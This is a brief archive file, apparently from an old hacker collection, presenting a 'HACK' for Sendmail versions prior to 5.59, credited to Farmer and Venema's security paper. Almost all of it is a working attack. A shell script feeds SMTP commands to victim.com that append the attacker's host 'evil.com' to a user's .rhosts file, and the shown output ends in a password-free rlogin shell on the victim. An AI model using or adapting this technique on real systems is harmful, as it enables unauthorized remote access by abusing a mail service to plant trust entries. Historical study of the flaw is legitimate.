..:-={{Collaborative Security Information Center}}=-:..
          X-TREME & TECHNOTRONIC Security Collaboration Project
     http://www.technotronic.com  -=©=-  http://www.x-treme.abyss.com

**************************************************************************
    HACK: Append to .rhosts files with Sendmail versions prior to 5.59
  System: Unix
  Source: Dan Farmer and Wietse Venema   
   Paper: Improving the Security of Your Site by Breaking Into it
**************************************************************************

 % cat evil_sendmail
 telnet victim.com 25 << EOSM
 rcpt to: /home/zen/.rhosts
 mail from: zen
 data
 random garbage
 .
 rcpt to: /home/zen/.rhosts
 mail from: zen
 data
 evil.com
 .
 quit
 EOSM

 evil % /bin/sh evil_sendmail
 Trying 128.128.128.1
 Connected to victim.com
 Escape character is '^]'.
 Connection closed by foreign host.

 evil % rlogin victim.com -l zen
         Welcome to victim.com!
 victim %